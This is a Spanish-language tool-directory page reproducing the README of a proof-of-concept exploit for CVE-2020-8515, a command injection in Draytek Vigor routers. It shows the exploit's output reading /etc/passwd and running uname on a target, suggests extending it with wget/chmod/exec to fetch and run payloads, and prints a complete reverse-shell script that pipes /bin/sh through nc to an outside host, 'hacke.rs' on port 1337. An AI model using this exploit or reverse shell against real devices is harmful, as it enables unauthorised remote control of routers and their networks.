Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-8515 — Draytek CVE-2020-8515 PoC | Kitploit
Herramientas/GitHubGitHub/darrenmartyn/cve-2020-8515
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubdarrenmartyn/cve-2020-8515

CVE-2020-8515

Draytek CVE-2020-8515 PoC

Ver Repositorio
54hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-8515

Draytek CVE-2020-8515 PoC que tenía dando vueltas.

Curiosamente, el comando inyectado se ejecuta dos veces, ver aquí:

root@kitploit:~
$ ./draytek.py draytek.local
(>) executing command: cat /etc/passwd
(+) vulnerable!
(>) executing command: uname -a
Linux Vigor3900 2.6.33.5 #1 Wed Mar 28 00:49:28 CST 2018 armv6l unknown
Linux Vigor3900 2.6.33.5 #1 Wed Mar 28 00:49:28 CST 2018 armv6l unknown

Tenía algunos planes para rematar esto como es debido, pero honestamente, es como, ¿un año después? y ya no recuerdo cuáles eran esos planes, así que aquí lo tienes. No es difícil añadir algo de wget/chmod/exec a esto, solo hay que mirar en la función "do_stuff".

Si descargas con wget y ejecutas un script como el siguiente, consigues una reverse shell:

root@kitploit:~
#!/bin/sh
HOST="hacke.rs"
PORT=1337
rm -f /tmp/a; mkfifo /tmp/a; nc $HOST $PORT 0</tmp/a | /bin/sh >/tmp/a 2>&1; rm /tmp/a

Creo que probablemente también puedes hacer echoload de un script así si consigues evitar los caracteres malos en la inyección, quizá lo añada más tarde - aunque el problema de la doble ejecución hace que eso sea bastante tedioso. Por ahora, esto está un poco a medio hacer, "decide el usuario".

Este exploit no causará mucho daño ITW, todas las cajas vulnerables a esto probablemente ya han sido cooptadas por botnets DDoS de script kiddies.

Para escanear: usa la plantilla de nuclei que alguien hizo

Descargar herramienta